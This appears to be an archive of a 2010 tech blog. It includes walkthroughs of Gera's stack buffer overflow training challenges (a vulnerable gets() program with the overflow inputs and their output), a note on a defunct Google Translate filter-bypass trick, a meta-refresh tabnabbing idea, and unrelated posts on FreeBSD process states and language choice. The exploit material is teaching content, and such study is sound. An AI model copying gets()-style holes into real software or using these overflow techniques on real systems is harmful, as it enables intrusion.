Thursday, December 23, 2010

Warming up to the stack #2

#include <stdio.h>
int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);
  if (cookie == 0x01020305)
    printf("you win!\n");
}

Gera's challenge #2 is exactly the same as the first one except for the cookie value we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation).

There are a few ways to deal with this:
  • Take a file similar to the original one and use a hex editor, like hexcurse(1), to manually modify it.
  • Use inline perl. perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
  • Enter the special characters directly by pressing Ctrl+V followed by Ctrl+key, where the key is the character at 0x40 + the value (for example, Ctrl+E for 0x05). This won't necessarily work on your terminal, since 0x03 is Ctrl+C.
%./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!

Tuesday, December 21, 2010

Gera's Insecure Programming: Warming up to the stack #1

Gera has a series of "challenges" designed to help teach people the basics of exploitation. The goal is to provide some input to the program to get it to output "you win!"

The code for the first one
/*
* stack1.c
* specially crafted to feed your brain by gera
*/
#include <stdio.h>
int main() {
   int cookie;
   char buf[80];
   printf("buf: %08x cookie: %08x\n", &buf, &cookie);
   gets(buf);
   if (cookie == 0x41424344)
      printf("you win!\n");
}

At a lower level
The assembly for the above program, as generated by clang on FreeBSD with -O3 -fomit-frame-pointer (comments are my addition):
...
main:
   pushl %esi
   subl $100, %esp
   leal -8(%ebp), %eax
   movl %eax, 8(%esp)
   leal -88(%ebp), %esi
   movl %esi, 4(%esp)
   movl $.L.str, (%esp)
   call printf
   movl %esi, (%esp)
   call gets      ; note that gets does not have a length argument
   cmpl $1094861636, -8(%ebp)
   jne .LBB0_2    ; we will come back to this
   movl $str, (%esp)
   call puts
.LBB0_2:
   xorl %eax, %eax
   addl $100, %esp
   popl %esi
   ret
...

Break it down
The program starts off by creating two variables: a cookie and a fixed-size buffer. It then prints out the addresses of buf and cookie.
Then the fun starts: gets(3) is called to put data in buf. gets is a very insecure function. To quote the man page:
The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.
Then we have a check to see if cookie is equal to some value. We can convert this value from an integer to printable ascii(7) characters: 0x41 is A, 0x42 is B, etc. So we want to set the cookie to "ABCD". There is one little gotcha: the machine I'm using (and most of you probably are) is little endian, so we actually need to reverse the order of our text.
What should we actually do?
There is no guarantee of how C variables are stored but we can make a good guess. On my system sizeof(int) is 4 and sizeof(char) is always 1 so our stack probably looks like:
cookie most significant byte
cookie byte 2
cookie byte 3 
cookie least significant byte
buf[79]
buf[78]
...
buf[0]
Let's try it!

The string we want to insert is
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDCBA. 80 random characters to fill the buffer and then DCBA to fill the cookie (the important part)

[eitan@ByteByte ~/gstack ]%echo $(jot -b x -s '' 80)DCBA > exploit 
[eitan@ByteByte ~/gstack ]%./a.out <exploit 
buf: bfbfea48 cookie: bfbfea98
you win!
A different way:
Let's say we didn't have the source and that this was some music player we wanted to (legally) jailbreak. If you disassemble the file you can change the jump address or just remove the jump altogether to avoid the check.
[eitan@ByteByte ~/gstack !130!]%./a.out
buf: bfbfea48 cookie: bfbfea98
you win!
Some notes

No serious programmer uses gets anymore and real exploits are likely to be harder to create due to OpenBSD's w^x protection, gcc's stack protector, and good coding habits. This was just an intro to the art of exploitation. I plan on following with either the next warming up to the stack challenge or the "esoteric" format string vulnerabilities.

Update 12/26/10 clarified the goal of the exploit. Explained what "jot" does.

Thursday, December 2, 2010

Google translate proxy no longer available

One old trick to bypass simple domain-based filters was to use Google Translate on the domain and go from English to English (or the native language to the native language, whatever it might be).

I recently came across a link that happened to be using Google Translate in that way (I'm not sure why) and I got an error from Google:

"Translation from English into English is not supported."

When I tried with other languages I got similar errors. Translating to other languages works as usual.

Luckily this trick is not really needed as there are thousands of available proxies or one could just make their own.

Sunday, October 10, 2010

What language should you learn first?

Kaushal Shriyan on the beginners@perl.org mailing list asked:
"Is it better to learn Perl or Python since i can manage only writing simple bash shell scripts."[1]
Recently on ##C++-basic there was a discussion that related to learning low level vs high level languages first.

Both of these discussions are based on the premise that there is a right answer.

There are a number of things wrong with this question.
  1. Kaushal seems to be saying that he can only learn one language or the other. Why not learn both?
  2. Programming language choice depends on the project one plans on working on. Using Perl to write a kernel is impractical and using COBOL to write a GUI application is silly. Asking such a question requires more context.
  3. For some reason Perl and Python are the only languages given as choices. What about C++? Why not Haskell? There are many useful languages and they each have their own pros and cons.
More generally, there are many skills a programmer needs to have and there are different ways of learning each of these skills.
  • Code organization and Design Patterns
  • Programming constructs
  • Abstraction and encapsulation
  • Data structures and how to choose between them
  • Syscalls and context switching
  • and many more
All of these topics can be reasonably broken down into two types: programming topics and computer science topics.

Higher-level languages allow programmers to abstract away the low level details and focus on getting a task done. This is great for completing a task and making a beginner feel proud about what (s)he has created. It also helps the programmer learn programming basics such as variables, loops, arrays, input/output, and functions without getting bogged down with memory management.

On the other hand, choosing between various data structures is confusing unless one understands why things work the way they do. Learning about context switches, data structures, syscalls, pointers, etc. is easier in a low-level language (like C or C++).
 
So what language should someone learn first?

A good programmer should learn both types of languages. In my experience a lot of beginners have trouble wrapping their heads around functions and other organizational patterns such as classes. I usually start people with Python and move quickly to C++. This helps to teach good programming style and techniques before they get to the low-level concepts.

[1] http://comments.gmane.org/gmane.comp.python.tutor/65413

Monday, September 20, 2010

Process Kernel States (wchan in ps)

FreeBSD has a nice feature: pressing Ctrl-T sends SIGINFO to the foreground process and prints some interesting data about it, such as the CPU load, the command currently being run, and the kernel state the process is in (the wchan keyword in ps(1)).
This state is set by the msleep function and names the syscall or lock that the process is waiting on.

I know of no other list explaining each of these states so here it goes:

biord: block on io read.
futex: [Linux emulation] process is waiting until a futex is released (see fast userspace mutex)
getblk: get block (seems to be generated often by tar)
nanslp: process is sleeping for some number of nanoseconds (see nanosleep(2))
pause: process is waiting for a signal (see pause(3))
pcmwrv: waiting for audio samples to be played
piperd: read(2) from a pipe
pipewr: write(2) to a pipe
physrd: reading from a HDD
runnable: process is ready to run on the CPU
running: currently on CPU
sbwait: wait for socket to return data (see uipc_sockbuf.c) 
swread: read in from swap
stopev: process is stopped because of a debugging event (see sys_process.c; relates to ptrace(2))
ttyout: write(2) to a tty
ttyin: read(2) from a tty
ucond: a process is blocked waiting on a pthreads condition variable
vnread: part of the pager (see vnode_pager.c)
wait: wait(2) for a child process
wdrain: write drain. On a device mounted with the async option (or soft-updates) wait until all the previous writes have been completed. (see vfs_bio.c)
zombie: a process died but its parent did not wait(2) for it.

There are other syscalls that are similar to the ones mentioned above (such as readv(2) instead of read(2), and waitpid(2) instead of wait(2)) which will end up with the same wchans.

Thank you irc://irc.efnet.org/nox--- for helping me figure out what all of these mean.

I will try to keep this list up-to-date as I find out about more of them.

Update 9/21/10: removed "CPU0" state - it doesn't show up in the siginfo output - only in the top output.
Update 9/22/10: added getblk entry without link to syscall
Update 10/7/10: added wdrain, swread - I have a /lot/ more to add. 
I need to add all the following - and more: sfbufa, umtxqb, psleep, qsleep, bo_wwait, bwunpin, sigwait, pause, suspkp, ktsusp, mntref, "mount drain", roothold, rootwait, failpt, exithold, exit1, ritwait, kqflxwt, kqclose, kqclo1, kqclo2, kqkclr, ithread, iev_rmh, purgelocks, conifhk, aioprn, aiordy, aiospn, aiowc, vlruwt, vlruwk, targrd, tgabrt, cgticb, sgread, simfree, ccb_scanq, crydev, crypto_destroy, crypto_ret_wait

Wednesday, June 30, 2010

Sunday, May 30, 2010

Tabnabbing Without Javascript

    I recently came across a new type of phishing attack called tabnabbing. The attack works by using a client-side script to detect when the user is not viewing the page and then changing the page content to a phishing page.

    This method, described by Aza Raskin, could be easily prevented by disabling Javascript. However, it is possible to perform the attack even if Javascript is disabled. Most browsers have the ability to refresh the page using a <meta> refresh tag. The page waits until presumably the user isn't looking at the tab any more, then changes the location of the page to one that resembles the true site (as shown in this proof of concept).

If you got to this post via the POC please note that the POC is not a phishing site and I DO NOT log ANY usernames or passwords.